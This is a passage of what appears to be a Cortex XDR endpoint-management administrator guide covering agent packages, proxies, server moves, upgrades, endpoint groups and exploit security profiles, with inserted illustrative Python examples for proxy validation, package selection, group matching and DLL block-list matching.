• For macOS endpoints, download the ZIP installation folder and upload it to the endpoint. To deploy
the Cortex XDR agent using JAMF, upload the ZIP folder to JAMF. Alternatively, to install the agent
manually on the endpoint, unzip the ZIP folder and double-click the pkg file.
• For Linux endpoints, you can download .rpm or .deb installers (according to the endpoint
Linux distribution) and deploy them on the endpoints using the Linux package manager.
Alternatively, you can download a Shell installer and deploy it manually on the endpoint.

When you upgrade a Cortex XDR agent that was not installed with a package manager, Cortex
XDR by default converts the installation to a package-manager installation that matches
the endpoint Linux distribution.
• For Android endpoints, Cortex XDR creates a tenant-specific download link which you can distribute
to Android endpoints. When a newer agent version is available, Cortex XDR identifies older package
versions as [Outdated].

STEP 9 | Next steps:


As needed, you can return to the Agent Installations page to manage your agent installation packages.
To manage a specific package, right click the agent version, and select the desired action:
• Edit the package name or description.
• Delete the installation package. Deleting an installation package does not uninstall the Cortex XDR
agent software from any endpoints.

Since Cortex XDR relies on the installation package ID to approve agent registration
during install, it is not recommended to delete the installation package of active
endpoints. If you install the Cortex XDR agent from a package after you delete it,
Cortex XDR denies the registration request, leaving the agent in an unprotected
state. Hiding the installation package instead removes it from the default list of available
installation packages, which can be useful to eliminate confusion within the management
console main view. Hidden installation packages can be viewed by removing the default
filter.
• Copy text to clipboard to copy the text from a specific field in the row of an installation package.

• Hide installation packages. Using the Hide option provides a quick method to filter out results based
on a specific value in the table. You can also use the filters at the top of the page to build a filter from
scratch. To create a persistent filter, save it.

Set an Application Proxy for Cortex XDR Agents


This capability is supported on endpoints with Traps agent 5.0.9 (Windows only) or Cortex
XDR agent 7.0 and later releases.

In environments where agents communicate with the Cortex XDR server through a system-wide proxy,
you can set an application-specific proxy for the Traps and Cortex XDR agent without affecting the
communication of other applications on the endpoint. You can set the proxy in one of three ways: during
the agent installation, after installation using Cytool on the endpoint, or from Endpoint Management
in Cortex XDR as described in this topic. You can assign up to five different proxy servers per agent.
The proxy server the agent uses is selected randomly and with equal probability. If communication
between the agent and the Cortex XDR server through the app-specific proxies fails, the agent resumes
communication through the system-wide proxy defined on the endpoint. If that fails as well, the agent
resumes communication with Cortex XDR directly.

STEP 1 | From Cortex XDR, select Endpoints > Endpoint Management > Endpoint Administration.

STEP 2 | If needed, filter the list of endpoints.

STEP 3 | Set an agent proxy.


1. Select the row of the endpoint for which you want to set a proxy.
2. Right-click the endpoint and select Endpoint Control > Set Endpoint Proxy.

3. You can assign up to five different proxies per agent. For each proxy, enter the IP address and port
number. For Cortex XDR agents 7.2.1 and later, you can also configure the proxy by entering the
FQDN and port number. When you enter the FQDN, use either all lowercase letters or all
uppercase letters, and avoid special characters or spaces.
For example: my.network.name:808,YOUR.NETWORK.COM:888,10.196.20.244:8080.
4. Set when you’re done.
5. If necessary, you can later Disable Endpoint Proxy from the right-click menu.
When you disable the proxy configuration, all proxies associated with that agent are removed. The
agent resumes communication with the Cortex XDR server through the system-wide proxy if one is
defined; otherwise, the agent resumes communicating directly with the Cortex XDR server. If neither
a system-wide proxy nor direct communication is available when you disable the proxy, the agent
disconnects from Cortex XDR.
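As an added illustration for this topic (example code written for this guide section, not part of Cortex XDR or the agent software), the following Python validates a proxy list in the form the Set Endpoint Proxy dialog accepts (comma-separated IP:port or FQDN:port entries, at most five, each FQDN in a single case, no spaces or special characters) and models the fallback order described above: the app-specific proxies, then the system-wide proxy if defined, then a direct connection. The `Proxy` class, the `DIRECT` sentinel and the `reachable` set are constructs of the example; that the agent tries every app-specific proxy in random order before falling back is a simplifying assumption of the example.

```python
import ipaddress
import random
import re
from dataclasses import dataclass

MAX_PROXIES = 5                          # the console accepts up to five proxies per agent
DIRECT = "direct"                        # sentinel for a direct connection to Cortex XDR
_LABEL = re.compile(r"^[A-Za-z0-9-]+$")  # FQDN label: letters, digits and hyphens only


@dataclass(frozen=True)
class Proxy:
    host: str
    port: int


def parse_proxy_list(text: str) -> list:
    """Parse and validate the comma-separated 'host:port' list of Set Endpoint Proxy."""
    if re.search(r"\s", text):
        raise ValueError("spaces are not allowed in the proxy list")
    entries = text.split(",")
    if len(entries) > MAX_PROXIES:
        raise ValueError(f"at most {MAX_PROXIES} proxies are allowed, got {len(entries)}")
    proxies = []
    for entry in entries:
        host, sep, port_str = entry.rpartition(":")
        if not sep or not host or not port_str.isdigit():
            raise ValueError(f"expected host:port, got {entry!r}")
        port = int(port_str)
        if not 1 <= port <= 65535:
            raise ValueError(f"port out of range in {entry!r}")
        try:
            ipaddress.IPv4Address(host)  # a plain IPv4 address needs no further checks
        except ipaddress.AddressValueError:
            # Not an IPv4 address, so it must be an FQDN: plain labels, single case.
            if not all(_LABEL.match(label) for label in host.split(".")):
                raise ValueError(f"FQDN {host!r} may contain only letters, digits, hyphens and dots")
            if host != host.lower() and host != host.upper():
                raise ValueError(f"FQDN {host!r} must be all lowercase or all uppercase")
        proxies.append(Proxy(host, port))
    return proxies


def is_valid_proxy_list(text: str) -> bool:
    """Convenience wrapper: True when parse_proxy_list accepts the text."""
    try:
        parse_proxy_list(text)
        return True
    except ValueError:
        return False


def route_order(app_proxies, system_proxy, rng=random) -> list:
    """Order in which the agent tries to reach the server: the app-specific proxies in
    random order (each equally likely to be tried first), then the system-wide proxy
    if one is defined, then a direct connection (simplified model of the guide's text)."""
    order = list(app_proxies)
    rng.shuffle(order)
    if system_proxy is not None:
        order.append(system_proxy)
    order.append(DIRECT)
    return order


def choose_route(app_proxies, system_proxy, reachable, rng=random):
    """Return the first route that works, or None when the agent ends up disconnected
    (for example after Disable Endpoint Proxy on an endpoint with neither a system-wide
    proxy nor a direct path). `reachable` is a constructed set of working routes."""
    for route in route_order(app_proxies, system_proxy, rng):
        if route in reachable:
            return route
    return None


if __name__ == "__main__":
    proxies = parse_proxy_list("my.network.name:808,YOUR.NETWORK.COM:888,10.196.20.244:8080")
    system_proxy = Proxy("proxy.corp.example", 3128)   # constructed system-wide proxy
    print("parsed:", proxies)
    print("route when only the system proxy works:",
          choose_route(proxies, system_proxy, reachable={system_proxy, DIRECT}))
    print("route after disabling app proxies with nothing else available:",
          choose_route([], None, reachable=set()))
```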

Move Cortex XDR Agents Between Managing XDR Servers
You can move existing agents between Cortex XDR managing servers directly from the Cortex XDR
management console. This can be useful during POCs or to better manage the allocation of your agents
between tenants. When you change the server that manages the agent, the agent transfers to the new
managing server as a freshly installed agent, without any data that was previously stored for it on the
original managing server. After the Cortex XDR agent registers with the new server, it can no longer
communicate with the previous one.
The following are prerequisites to enable you to change the managing server of a Cortex XDR agent:
• Ensure that you are running a Cortex XDR agent 7.2 or later release.
• Ensure you have administrator privileges for Cortex XDR in the hub.
To register to another managing server, the Cortex XDR agent requires the distribution ID of an
installation package on the target server in order to identify itself as a valid Cortex XDR agent. The agent
must provide the ID of an installation package for the same operating system and for the same or an
earlier agent version. For example, if you want to move a Cortex XDR Agent 7.0.2 for Windows, you can
select on the target managing server the ID of an installation package created for a Cortex XDR Agent
5.0.0 for Windows. The operating system version can be different.
To change the managing server of a Cortex XDR Agent:
To change the managing server of a Cortex XDR Agent:

STEP 1 | Obtain an installation package ID from the target managing server.


1. Log in to Cortex XDR on the target management server, then navigate to Endpoints > Endpoint
Management > Agent Installations.
2. From the agent installations table, locate a valid installation package you can use to register the
agent. Alternatively, you can create a new installation package if required.
3. Right-click the ID field and copy the value. Save this value, you will need it later for the registration
process. If the ID column is not displayed in the table, add it.

STEP 2 | Locate the Cortex XDR agent you want to move.


Log in to the current managing server of the Cortex XDR agent and navigate to Endpoints > Endpoint
Management > Endpoint Administration.

STEP 3 | Change the managing server.


1. Select one or more agents that you want to move to the target server.
2. Alt + right-click to open the options menu in advanced mode, and select Endpoint Control > Change
managing server. This option is available only for an administrator in Cortex XDR and for Cortex XDR
agent 7.2 and later releases.

3. Enter the ID number of the installation package you obtained in Step 1. If you selected agents
running on different operating systems, for example Windows and Linux, you must provide an ID for
each operating system. When done, click Move.

STEP 4 | Track the action.
When you track the action in the Action Center, the original managing server keeps displaying the In
progress (Sent) status even after the action has completed successfully, because the agent no longer
reports to this managing server. The new managing server records the move as a new agent registration action.
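The package-selection rule in this procedure (same operating system, same or earlier agent version, operating system version irrelevant, one ID per operating system among the selected agents) is easy to get wrong when versions are compared as strings. The following Python, an added example that is not part of Cortex XDR, checks a set of agents against the target server's installation packages before the move; the package IDs and version numbers are constructed placeholders, and picking the newest usable package per operating system is a choice of the example, since any usable package satisfies the rule.

```python
def parse_version(version: str) -> tuple:
    """'7.10.1' -> (7, 10, 1): compare numerically, never as strings ('7.10' < '7.2' as text)."""
    return tuple(int(part) for part in version.split("."))


def package_accepts_agent(agent_os: str, agent_version: str,
                          package_os: str, package_version: str) -> bool:
    """A target-server installation package can register a moved agent only if it is for
    the same operating system and for the same or an earlier agent version. The operating
    system version does not matter, so it is deliberately not part of the check."""
    return (agent_os == package_os
            and parse_version(package_version) <= parse_version(agent_version))


def select_package_ids(agents, packages) -> dict:
    """agents:   (os, agent_version) for every agent selected for the move.
    packages: (package_id, os, agent_version) rows from the target server's
              Agent Installations table (constructed placeholders in the demo below).
    Returns one package ID per operating system, chosen so that it is usable by the
    oldest selected agent of that OS and therefore by all of them. Raises ValueError
    when an operating system has no usable package on the target server."""
    oldest_per_os = {}
    for os_name, version in agents:
        current = oldest_per_os.get(os_name)
        if current is None or parse_version(version) < parse_version(current):
            oldest_per_os[os_name] = version
    chosen = {}
    for os_name, oldest in oldest_per_os.items():
        usable = [(pkg_id, pkg_version) for pkg_id, pkg_os, pkg_version in packages
                  if package_accepts_agent(os_name, oldest, pkg_os, pkg_version)]
        if not usable:
            raise ValueError(f"no installation package on the target server fits "
                             f"{os_name} agents at version {oldest} or earlier")
        # Prefer the newest package that is still not newer than the oldest agent.
        chosen[os_name] = max(usable, key=lambda item: parse_version(item[1]))[0]
    return chosen


if __name__ == "__main__":
    # Constructed sample data: agents being moved and packages on the target server.
    agents = [("Windows", "7.2.1"), ("Windows", "7.2.0"), ("Linux", "7.2.1")]
    packages = [
        ("PKG-WIN-A", "Windows", "7.2.1"),   # too new for the 7.2.0 Windows agent
        ("PKG-WIN-B", "Windows", "5.0.0"),
        ("PKG-LIN-A", "Linux", "7.3.0"),     # too new for the Linux agent
        ("PKG-LIN-B", "Linux", "7.1.0"),
        ("PKG-LIN-C", "Linux", "7.2.1"),
    ]
    print(select_package_ids(agents, packages))
```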

Upgrade Cortex XDR Agents


After you install the Cortex XDR agent and the agent registers with Cortex XDR, you can upgrade the
Cortex XDR agent software using a method supported by the endpoint platform:
• Android—Upgrade the app directly from the Google Play Store or push the app to your endpoints from
an endpoint management system such as AirWatch.
• Windows, Mac, or Linux—Create new installation packages and push the Cortex XDR agent package to
up to 5,000 endpoints from Cortex XDR.

You cannot upgrade VDI endpoints. Additionally, you cannot upgrade a Golden Image
from Cortex XDR agent 6.1.x or an earlier release to a Cortex XDR agent 7.1.0 or a later
release.
Upgrades are supported using actions which you can initiate from the Action Center or from Endpoint
Administration as described in this workflow.

STEP 1 | Create an Agent Installation Package for each operating system version for which you want to
upgrade the Cortex XDR agent.
Note the installation package names.

STEP 2 | Select Endpoints > Endpoint Management.


If needed, filter the list of endpoints. To reduce the number of results, use the endpoint name search and
the Filters at the top of the page.

STEP 3 | Select the endpoints you want to upgrade.


You can also select endpoints running different operating systems to upgrade the agents at the same
time.

STEP 4 | Right-click your selection and select Endpoint Control > Upgrade agent version.

For each platform, select the name of the installation package you want to push to the selected
endpoints.
Starting in the Cortex XDR agent 7.1 release, you can install the Cortex XDR agent on Linux endpoints
using a package manager. When you upgrade an agent on a Linux endpoint that is not using a package
manager, Cortex XDR by default converts the installation to a package-manager installation according to
the endpoint Linux distribution. Alternatively, if you do not want to use the package manager, clear the
option Upgrade to installation by package manager.

The Cortex XDR agent keeps the name of the original installation package after every
upgrade.

STEP 5 | Upgrade.

Cortex XDR distributes the installation package to the selected endpoints at the next heartbeat
communication with the agent. To monitor the status of the upgrades, go to Response > Action Center.
From the Action Center you can also view additional information about the upgrade (right-click the
action and select Additional data) or cancel the upgrade (right-click the action and select Cancel Agent
Upgrade).

• During the upgrade process, the endpoint operating system might request a reboot.
However, you do not have to perform the reboot for the Cortex XDR agent upgrade
process to complete successfully.
• After you upgrade to a Cortex XDR agent 7.2 or a later release on an endpoint with
Cortex XDR Device Control rules, you need to reboot the endpoint for the rules to take
effect.

Delete Cortex XDR Agents


From Cortex XDR, you can delete a Cortex XDR agent from one or more Windows, Mac, or Linux endpoints
that have disconnected from the Cortex XDR management console. Deleting an endpoint triggers the
following lifespan flow:
• Standard agents are deleted after 180 days of inactivity.
• VDI and TS agents are deleted after 6 hours of inactivity.

To reinstate a deleted endpoint, you must uninstall and reinstall the Cortex XDR agent on it.

After an endpoint is deleted, data associated with the deleted endpoint is displayed in the Action Center
tables and in the Causality View with an Endpoint Name of N/A (Endpoint Deleted). Alerts that
already include the endpoint data at the time of the alert creation are not affected.
The following workflow describes how to delete the Cortex XDR agent from one or more Windows, Mac, or
Linux endpoints.

STEP 1 | Select Endpoints > Endpoint Management > Endpoint Administration.

STEP 2 | Right-click the endpoint you want to remove.


You can also select multiple endpoints if you want to perform a bulk delete.

STEP 3 | Select Endpoint Control > Delete Endpoint.

Uninstall the Cortex XDR Agent


From Cortex XDR, you can uninstall the Cortex XDR agent from one or more Windows, Mac, or Linux
endpoints at any time. You can uninstall the Cortex XDR agent from an unlimited number of endpoints in a
single bulk action. To uninstall the Cortex XDR app for Android, you must do so from the Android endpoint.
The following workflow describes how to uninstall the Cortex XDR agent from one or more Windows, Mac,
or Linux endpoints.

STEP 1 | Log in to Cortex XDR.


Go to Response > Action Center > + New Action.

STEP 2 | Select Agent Uninstall.

STEP 3 | Click Next.

STEP 4 | Select the target endpoints (up to 100) for which you want to uninstall the Cortex XDR agent.

If needed, Filter the list of endpoints by attribute or group name.

STEP 5 | Click Next.

STEP 6 | Review the action summary and click Done when finished.

STEP 7 | To track the status of the uninstallation, return to the Action Center.

Set an Alias for an Endpoint


To identify one or more endpoints by a name that is different from the endpoint hostname, you can
configure an alias. You can set an alias for a single endpoint or you can set an alias for multiple endpoints in
bulk. To quickly search for the endpoints during investigation and when you need to take action, you can
use either the endpoint hostname or the alias.

STEP 1 | Select Endpoints > Endpoint Management > Endpoint Administration.

STEP 2 | Select one or more endpoints.

STEP 3 | Right-click anywhere in the endpoint rows.

STEP 4 | Select Endpoint Control > Change Endpoint Alias.

STEP 5 | Enter the alias name and Update.


If you later change your mind, you can Clear alias of all selected agents from the same menu.

STEP 6 | Use the Quick Launcher to search the endpoints by alias across the Cortex XDR management
console.

Define Endpoint Groups
To easily apply policy rules to specific endpoints, you can define an endpoint group. There are two methods
you can use to define an endpoint group:
• Create a dynamic group by allowing Cortex XDR to populate your endpoint group dynamically using
endpoint characteristics such as a partial hostname or alias; full or partial domain or workgroup name; IP
address, range or subnet; installation type (VDI, temporary session, or standard endpoint); agent version;
endpoint type (workstation, server, mobile); or operating system version.
• Create a static group by selecting a list of specific endpoints.
After you define an endpoint group, you can then use it to target policy and actions to specific recipients.
The Endpoint Groups page displays all endpoint groups along with the number of endpoints and policy rules
linked to the endpoint group.
To define an endpoint static or dynamic group:

STEP 1 | From Cortex XDR, select Endpoints > Endpoint Management > Endpoint Groups > +Add
Group.

STEP 2 | Select either Create New to create an endpoint group from scratch, or Upload From File
to populate a static endpoint group from a plain text file that lists IP addresses, hostnames, or
aliases, one per line.

STEP 3 | Enter a Group Name and optional Description to identify the endpoint group. The name you
assign to the group will be visible when you assign endpoint security profiles to endpoints.

STEP 4 | Determine the endpoint properties for creating an endpoint group:


• Dynamic—Use the filters to define the criteria you want to use to dynamically populate an endpoint
group. Dynamic groups support multiple criteria selections and can use AND or OR operators. For
endpoint names and aliases, and domains and workgroups, you can use * to match any string of
characters. As you apply filters, Cortex XDR displays any registered endpoint matches to help you
validate your filter criteria.

Cortex XDR supports only IPv4 addresses.

• Static—Select specific registered endpoints that you want to include in the endpoint group. Use the
filters, as needed, to reduce the number of results.
When you create a static endpoint group from a file, the IP address, hostname, or alias of the
endpoint must match an existing agent that has registered with Cortex XDR. You can select up to
250 endpoints.

When you disconnect the Directory Sync Service (DSS) in your Cortex XDR
deployment, it might affect existing endpoint groups and policy rules based on Active
Directory properties.

STEP 5 | Create the endpoint group.


After you save your endpoint group, it is ready for use to assign security profiles to endpoints and in
other places where you can use endpoint groups.

STEP 6 | Manage an endpoint group, as needed.


At any time, you can return to the Endpoint Groups page to view and manage your endpoint groups. To
manage a group, right-click the group and select the desired action:
• Edit—View the endpoints that match the group definition, and optionally refine the membership
criteria using filters.
• Delete the endpoint group.
• Save as new—Duplicate the endpoint group and save it as a new group.
• Export group—Export the list of endpoints that match the endpoint group criteria to a tab-separated
values (TSV) file.
• View endpoints—Pivot from an endpoint group to a filtered list of endpoints on the Endpoint
Administration page where you can quickly view and initiate actions on the endpoints within the
group.
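To make the group semantics in this topic concrete, here is an added Python example (written for this guide section, not code from Cortex XDR) that evaluates dynamic-group criteria the way the text describes them: `*` matches any string of characters in hostnames, aliases, domains and workgroups; IP criteria accept a single address, a subnet or a range and are IPv4 only; multiple criteria combine with AND or OR. It also loads a static group from a one-entry-per-line file, matching entries against registered endpoints and enforcing the 250-endpoint limit. The `Endpoint` record, the field names, the `MATCHERS` table and the `REGISTERED` inventory are all constructs of the example.

```python
import ipaddress
import re
from dataclasses import dataclass

MAX_STATIC_MEMBERS = 250   # a static group loaded from a file holds up to 250 endpoints


@dataclass(frozen=True)
class Endpoint:
    hostname: str
    alias: str               # empty string when no alias is set
    domain: str
    ip: str
    install_type: str        # "standard", "vdi" or "temporary"
    agent_version: str
    endpoint_type: str       # "workstation", "server" or "mobile"


def wildcard_match(pattern: str, value: str) -> bool:
    """'*' matches any string of characters; names are compared case-insensitively."""
    regex = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.fullmatch(regex, value, re.IGNORECASE) is not None


def supported_address(ip: str) -> bool:
    """Cortex XDR endpoint groups support only IPv4 addresses."""
    return ipaddress.ip_address(ip).version == 4


def ip_match(spec: str, ip: str) -> bool:
    """spec is a single address, a CIDR subnet ('10.1.20.0/24') or a range ('start-end')."""
    if not supported_address(ip):
        raise ValueError(f"{ip}: only IPv4 addresses are supported")
    addr = ipaddress.IPv4Address(ip)
    if "-" in spec:
        start, end = (ipaddress.IPv4Address(p) for p in spec.split("-", 1))
        return start <= addr <= end
    if "/" in spec:
        return addr in ipaddress.IPv4Network(spec, strict=False)
    return addr == ipaddress.IPv4Address(spec)


# One predicate per dynamic-group criterion: field name -> how a value is matched.
MATCHERS = {
    "hostname": lambda ep, v: wildcard_match(v, ep.hostname),
    "alias": lambda ep, v: wildcard_match(v, ep.alias),
    "domain": lambda ep, v: wildcard_match(v, ep.domain),
    "ip": lambda ep, v: ip_match(v, ep.ip),
    "install_type": lambda ep, v: ep.install_type == v,
    "agent_version": lambda ep, v: ep.agent_version == v,
    "endpoint_type": lambda ep, v: ep.endpoint_type == v,
}


def dynamic_members(endpoints, criteria, operator="AND") -> list:
    """criteria: list of (field, value) pairs combined with AND or OR."""
    if operator not in ("AND", "OR"):
        raise ValueError("operator must be AND or OR")
    combine = all if operator == "AND" else any
    return [ep for ep in endpoints
            if combine(MATCHERS[field](ep, value) for field, value in criteria)]


def static_members_from_file(text: str, endpoints) -> tuple:
    """One IP address, hostname or alias per line. Returns (members, unmatched): entries
    that match no registered endpoint are reported rather than silently dropped."""
    entries = [line.strip() for line in text.splitlines() if line.strip()]
    if len(entries) > MAX_STATIC_MEMBERS:
        raise ValueError(f"a static group may contain at most {MAX_STATIC_MEMBERS} endpoints")
    lookup = {}
    for ep in endpoints:
        for key in (ep.hostname.lower(), ep.alias.lower(), ep.ip):
            if key:
                lookup[key] = ep
    members, unmatched = [], []
    for entry in entries:
        ep = lookup.get(entry.lower())
        if ep is None:
            unmatched.append(entry)
        elif ep not in members:
            members.append(ep)
    return members, unmatched


def hostnames(endpoints) -> list:
    return [ep.hostname for ep in endpoints]


# Constructed sample inventory (not real endpoints).
REGISTERED = [
    Endpoint("FIN-WS-01", "finance-laptop", "corp.example.com", "10.1.20.15",
             "standard", "7.2.1", "workstation"),
    Endpoint("fin-srv-02", "", "corp.example.com", "10.1.20.200",
             "standard", "7.2.1", "server"),
    Endpoint("vdi-pool-07", "", "corp.example.com", "10.1.30.7",
             "vdi", "7.2.0", "workstation"),
    Endpoint("lab-ws-03", "", "lab.example.com", "10.9.0.3",
             "standard", "7.1.0", "workstation"),
]

if __name__ == "__main__":
    print(hostnames(dynamic_members(REGISTERED, [("hostname", "fin-*"), ("ip", "10.1.20.0/24")])))
    print(static_members_from_file("finance-laptop\n10.1.30.7\nunknown-host\n", REGISTERED))
```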

About Content Updates
To increase security coverage and quickly resolve any issues in policy, Palo Alto Networks can seamlessly
deliver software packages for Cortex XDR called content updates. Content updates can contain changes or
updates to any of the following:

Starting with the Cortex XDR 7.1 agent release, Cortex XDR delivers to the agent the
content update in parts and not as a single file, allowing the agent to retrieve only the
updates and additions it needs.

• Default security policy including exploit, malware, restriction, and agent settings profiles
• Default compatibility rules per module
• Protected processes
• Local analysis logic
• Trusted signers
• Processes included in your block list by signers
• Behavioral threat protection rules
• Ransomware module logic including Windows network folders susceptible to ransomware attacks
• Windows Event Logs
• Python scripts provided by Palo Alto Networks
• Python modules supported in script execution
• Maximum file size for hash calculations in File search and destroy
• List of common file types included in File search and destroy
When a new update is available, Cortex XDR notifies the Cortex XDR agent. The Cortex XDR agent then
randomly chooses a time within a six-hour window during which it will retrieve the content update from
Cortex XDR. By staggering the distribution of content updates, Cortex XDR reduces the bandwidth load
and prevents bandwidth saturation due to the high volume and size of the content updates across many
endpoints. You can view the distribution of endpoints by content update version from the Cortex XDR
Dashboard.
To adjust content update distribution for your environment, you can configure the following optional
settings:
• Content distribution bandwidth as part of the Cortex XDR global agent configurations.
• Content download source, as part of the Cortex XDR agent setting profile.
Otherwise, if you want the Cortex XDR agent to retrieve the latest content from the server immediately,
you can force the Cortex XDR agent to connect to the server in one of the following methods:
• (Windows and Mac only) Perform manual check-in from the Cortex XDR agent console.
• Initiate a check-in using the Cytool checkin command.

Endpoint Security Profiles
Cortex XDR provides default security profiles that you can use out of the box to immediately begin
protecting your endpoints from threats. While security rules enable you to block or allow files to run
on your endpoints, security profiles help you customize and reuse settings across different groups of
endpoints. When the Cortex XDR agent detects behavior that matches a rule defined in your security
policy, the Cortex XDR agent applies the security profile that is attached to the rule for further inspection.

Profile Name Description

Exploit Profiles
Exploit profiles block attempts to exploit system flaws in browsers and in the operating system. For example, Exploit profiles help protect against exploit kits, illegal code execution, and other attempts to exploit process and system vulnerabilities. Exploit profiles are supported for Windows, Mac, and Linux platforms.
Add a New Exploit Security Profile.

Malware Profiles
Malware profiles protect against the execution of malware including trojans, viruses, worms, and grayware. Malware profiles serve two main purposes: to define how to treat behavior common with malware, such as ransomware or script-based attacks, and to define how to treat known malware and unknown files. Malware profiles are supported for all platforms.
Add a New Malware Security Profile.

Restrictions Profiles
Restrictions profiles limit where executables can run on an endpoint. For example, you can restrict files from running from specific local folders or from removable media. Restrictions profiles are supported only for Windows platforms.
Add a New Restrictions Security Profile.

Agent Settings Profiles
Agent Settings profiles enable you to customize settings that apply to the Cortex XDR agent (such as the disk space quota for log retention). For Mac and Windows platforms, you can also customize user interface options for the Cortex XDR console, such as accessibility and notifications.
Add a New Agent Settings Profile.

Exceptions Profiles
Exceptions Security Profiles override the security policy to allow a process or file to run on an endpoint, to disable a specific BTP rule, to allow a known digital signer, and to import exceptions from the Cortex XDR support team. Exceptions profiles are supported for Windows, Mac, and Linux platforms.
Add a New Exceptions Security Profile.

After you add the new security profile, you can Manage Security Profiles.

Add a New Exploit Security Profile


Exploit security profiles allow you to configure the action the Cortex XDR agent takes when attempts
to exploit software vulnerabilities or flaws occur. To protect against specific exploit techniques, you can
customize exploit protection capabilities in each Exploit security profile.
By default, the Cortex XDR agent will receive the default profile that contains a pre-defined configuration
for each exploit capability supported by the platform. To fine-tune your Exploit security policy, you can
override the configuration of each capability to block the exploit behavior, allow the behavior but report it,
or disable the module.
To define an Exploit security profile:

STEP 1 | Add a new profile.


1. From Cortex XDR, select Endpoints > Policy Management > Profiles > + New Profile.
2. Select the platform to which the profile applies and Exploit as the profile type.
3. Click Next.

STEP 2 | Define the basic settings.


1. Enter a unique Profile Name to identify the profile. The name can contain only letters, numbers, or
spaces, and must be no more than 30 characters. The name you choose will be visible from the list of
profiles when you configure a policy rule.
2. To provide additional context for the purpose or business reason that explains why you are creating
the profile, enter a profile Description. For example, you might include an incident identification
number or a link to a help desk ticket.

STEP 3 | Configure the action to take when the Cortex XDR agent detects an attempt to exploit each
type of software flaw.
For details on the different exploit protection capabilities, see Endpoint Protection Capabilities.
• Block—Block the exploit attack.
• Report—Allow the exploit activity but report it to Cortex XDR.
• Disabled—Disable the module and do not analyze or report exploit attempts.
• Default—Use the default configuration to determine the action to take. Cortex XDR displays the
current default configuration for each capability in parenthesis. For example, Default (Block).
To view which processes are protected by each capability, see Processes Protected by Exploit Security
Policy.
For Logical Exploits Protection, you can also configure a block list for the DLL Hijacking module. The
block list enables you to block specific DLLs when run by a protected process. The DLL folder or file
must include the complete path. To complete the path, you can use environment variables or the asterisk
(*) as a wildcard to match any string of characters (for example, */windows32/).
For Exploit Protection for Additional Processes, you can also add one or more additional processes.

In Exploit Security profiles, if you change the action mode for processes, you must restart
the protected processes for the following security modules to take effect on the process
and its forked processes: Brute Force Protection, Java Deserialization, ROP, and SO
Hijacking.

STEP 4 | Save the changes to your profile.

STEP 5 | Apply Security Profiles to Endpoints.


You can do this in one of two ways: Create a new policy rule using this profile from the right-click
menu, or launch the new policy wizard from Policy Rules.
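The DLL Hijacking block list described in Step 3 accepts a complete path, with environment variables or the asterisk (*) standing in for any string of characters (the guide's own example is */windows32/). The following Python is an added example, not code from Cortex XDR or the agent, that shows how such entries resolve against DLL paths loaded by protected processes so you can predict what a block list would catch before applying it. The environment values, block list entries and load events are constructed; the reading of an entry that ends in a separator as a folder that covers every DLL beneath it is an assumption of the example, as is the case-insensitive, separator-agnostic comparison.

```python
import re

# Constructed environment variable values as they would resolve on one endpoint.
ENV = {
    "SYSTEMROOT": "C:/Windows",
    "USERPROFILE": "C:/Users/alice",
    "TEMP": "C:/Users/alice/AppData/Local/Temp",
}


def _normalize(path: str) -> str:
    """Windows paths are case-insensitive and accept either separator (assumption)."""
    return path.replace("\\", "/").lower()


def expand_env(pattern: str, env: dict) -> str:
    """Expand Windows-style %VAR% references from the supplied map."""
    def lookup(match):
        name = match.group(1).upper()
        if name not in env:
            raise KeyError(f"unknown environment variable %{name}% in block list entry")
        return env[name]
    return re.sub(r"%([^%]+)%", lookup, pattern)


def compile_block_entry(entry: str, env: dict):
    """Turn one block-list entry into a matcher. '*' matches any string of characters,
    separators included. An entry ending in '/' names a folder and is taken to cover
    every DLL beneath it (this folder reading is an assumption of the example)."""
    expanded = _normalize(expand_env(entry, env))
    if expanded.endswith("/"):
        expanded += "*"
    regex = ".*".join(re.escape(part) for part in expanded.split("*"))
    return re.compile(regex)


def is_blocked(dll_path: str, block_list, env=ENV) -> bool:
    """True when a protected process loading dll_path would hit a block-list entry."""
    target = _normalize(dll_path)
    return any(compile_block_entry(entry, env).fullmatch(target) for entry in block_list)


def evaluate_loads(load_events, block_list, env=ENV) -> list:
    """load_events: (process, dll_path) pairs. Returns those that would be blocked."""
    return [(proc, dll) for proc, dll in load_events if is_blocked(dll, block_list, env)]


# Constructed block list in the guide's syntax (complete path, env vars or '*' allowed).
BLOCK_LIST = [
    "*/windows32/",
    "%TEMP%/*.dll",
    "%USERPROFILE%/Downloads/*",
    "C:/ProgramData/shared/helper.dll",
]

# Constructed DLL load observations from protected processes.
LOADS = [
    ("winword.exe", r"C:\Windows32\version.dll"),
    ("excel.exe", r"C:\Windows\System32\version.dll"),
    ("excel.exe", r"C:\Users\alice\AppData\Local\Temp\api-ms-win.dll"),
    ("mmc.exe", "c:/programdata/shared/HELPER.DLL"),
    ("mmc.exe", r"C:\ProgramData\shared\helper.dll.bak"),
    ("dllhost.exe", r"C:\Users\alice\Downloads\tools\plugin.dll"),
]

if __name__ == "__main__":
    for proc, dll in evaluate_loads(LOADS, BLOCK_LIST):
        print(f"blocked: {proc} loading {dll}")
```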

Processes Protected by Exploit Security Policy


By default, your exploit security profile protects endpoints from attack techniques that target specific
processes. Each exploit protection capability protects a different set of processes that Palo Alto Networks
researchers determine are susceptible to attack. The following tables display the processes that are
protected by each exploit protection capability for each operating system.

Windows Processes Protected by Exploit Security Policy

Browser Exploits Protection

• [updated version of Adobe Flash Player for Firefox installed on endpoint]
• browser_broker.exe
• chrome.exe
• firefox.exe
• flashutil_activex.exe
• iexplore.exe
• microsoftedge.exe
• microsoftedgecp.exe
• opera_plugin_wrapper.exe
• opera.exe
• plugin-container.exe
• safari.exe
• webkit2webprocess.exe

Logical Exploits Protection

• cliconfg.exe
• dism.exe
• dllhost.exe
• excel.exe
• migwiz.exe
• mmc.exe
• powerpnt.exe
• sysprep.exe
• winword.exe

Known Vulnerable Processes Protection

• 7z.exe
• 7zfm.exe
• 7zg.exe
• acrobat.exe
• acrord32.exe
• acrord32info.exe
• allplayer.exe
• applemobiledeviceservice.exe
• apwebgrb.exe
• armsvc.exe
• blazehdtv.exe
• bsplayer.exe
• cmd.exe
• eqnedt32.exe
• excel.exe
• flashfxp.exe
• fltldr.exe
• fontdrvhost.exe
• foxit reader.exe
• foxitreader.exe
• groovemonitor.exe
• hxmail.exe
• i_view32.exe
• infopath.exe
• ipodservice.exe
• itunes.exe
• ituneshelper.exe
• journal.exe
• jqs.exe
• microsoft.photos.exe
• msaccess.exe
• mspub.exe
• mstsc.exe
